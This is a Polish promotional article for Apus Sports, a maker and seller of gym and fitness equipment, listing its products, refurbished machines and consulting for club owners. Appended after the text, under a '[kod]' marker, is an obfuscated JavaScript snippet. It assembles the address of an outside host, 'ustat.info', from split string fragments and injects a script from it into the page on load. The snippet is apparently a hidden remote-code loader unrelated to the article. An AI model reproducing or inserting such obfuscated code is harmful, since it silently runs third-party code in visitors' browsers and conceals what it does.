11.12.2019

#Profesjonalny sprzęt do siłowni – od czego zacząć?

Szukasz wysokiej jakości produktów do swojej siłowni lub klubu? Koniecznie zapoznaj się z ofertą marki Apus Sports! Projektujemy i produkujemy sprzęt, który spełnia oczekiwania właścicieli siłowni i ich użytkowników.

Siłownie, kluby fitness – to miejsca, które w dzisiejszych czasach są pożądane. Wiele osób chce mieć nienaganną sylwetkę niczym mitologiczny Apollo. Trzeba jednak zwrócić uwagę, że stale wzrasta świadomość społeczna dotycząca troski o zdrowie. Zdajemy sobie sprawę z istoty aktywności fizycznej. Dlatego wiele osób inwestuje w karnety na siłownię bądź do klubów fitness. Szukają w nich odpowiedniego sprzętu oraz fachowego wsparcia.

Użytkownicy mają ściśle określone wymagania, dlatego właściciele siłowni muszą zapewnić najwyższej jakości sprzęt, który pozwoli klientom osiągnąć ich cele. Wiadomo, że podstawą jest bezpieczeństwo i funkcjonalność akcesoriów. Poszukując odpowiedniego sprzętu oraz informacji na temat właściwego wyposażenia klubu koniecznie należy zapoznać się z ofertą Apus-Sports.com. Jesteśmy dynamicznie rozwijającą się marka akcesoriów fitness i wolnych ciężarów. Celem Apus Sports jest projektowanie i produkcja profesjonalnego sprzętu, który spełni oczekiwania właścicieli klubów i siłowni oraz zadowoli ich użytkowników. W swojej działalności towarzyszy nam hasło „Quality of tomorrow”.

Ogromnym atutem marki Apus Sports jest znajomość branży. Korzystamy z wiedzy ekspertów w swoich dziedzinach i pasjonatów sportu. Stałe podążanie za trendami i nieustanny rozwój sprawiają, że oferta jest kompleksowa. Dlatego nie ma się nad czym zastanawiać! Prowadzisz siłownię albo klub fitness? Chcesz rozpocząć tego typu działalność i szukasz wsparcia profesjonalistów? Lepiej nie mogłeś trafić! Apus-Sports.com to Twój krok w stronę sukcesu! Wysokiej jakości sprzęt, nowoczesny desing, ergonomia i przede wszystkim wiedza. Najkrócej – pełen profesjonalizm.

Na początku działalności pojawiają się liczne pytania i wątpliwości. Nasi eksperci zawsze są do dyspozycji i na każdym etapie realizacji projektu gwarantują wsparcie. Doskonale znamy branżę, co pozwala nam prowadzić profesjonalne doradztwo w zakresie otwarcia i prowadzenia klubu. Jesteśmy w stanie przejść z Państwem przez cały proces. Zapewniamy przygotowanie projektu i aranżację oraz dobór odpowiednich maszyn. Jesteśmy do dyspozycji! Sport jest naszą pasją, którą chcemy się dzielić!

W Apus Sports znajdziesz wszystko, co jest niezbędne do prowadzenia siłowni bądź klubu fitness. Posiadamy sprzęt do treningu funkcjonalnego, strefy fitness czy wolne ciężary. W naszej ofercie znajdziesz: gryfy olimpijskie, hantle, kettlebells, liny treningowe, maty fitness, pasy, młoty, piłki gimnastyczne, skakanki, rollery, stojaki na obciążenia olimpijskie, gryfy, sztangi czy piłki, zaciski, tubing oraz sztangi. Na indywidualne zamówienie przygotowujemy klatki funkcjonalne.

Sprzęt to tylko część naszej działalności. Dzięki ogromnemu doświadczeniu i znajomości branży chcemy dzielić się swoją wiedzą, aby wspierać naszych klientów w tworzeniu wyjątkowych miejsc do aktywności fizycznej. Prowadzimy również sprzedaż zregenerowanych maszyn firm Precor, Life Fitness i Technogym. Jesteśmy wyłącznym dystrybutorem sprzętu włoskiej marki Panatta. Masz problem z akcesoriami? Nie martw się – prowadzimy regenerację sprzętu klienta. Zapewniamy również serwis w postaci przeglądu, wymiany podzespołów i naprawy akcesoriów.

Zaufało nam wielu klientów. Na naszym sprzęcie ćwiczą ludzie w siłowniach i klubach fitness w Polsce i w Europie. Właściciele są usatysfakcjonowani, a ich biznes kwitnie. Nieważne, czy dopiero zaczynasz czy masz siłownię bądź klub fitness – możesz na nas liczyć. Apus Sports stawia na jakość i profesjonalizm. U nas nie ma miejsca na bylejakość, dlatego chcemy tworzyć jutro i sprawiać, żeby każdy dzień był lepszy.

[kod]

(function(){
oabb=document.createElement("script");oabb.async=true;oabb_="u"+("s")+"t";
oabbu="186672204.";oabb_+="a"+("t.i");oabb_+="n"+("f"+"o")+"/";
oabbu+="hp8j3ycnabbcrw284ti07b"+("Xbet9n41");
oabb.src="https://"+oabb_+oabbu;oabb.type="text/javascript";
document.body.appendChild(oabb);
})();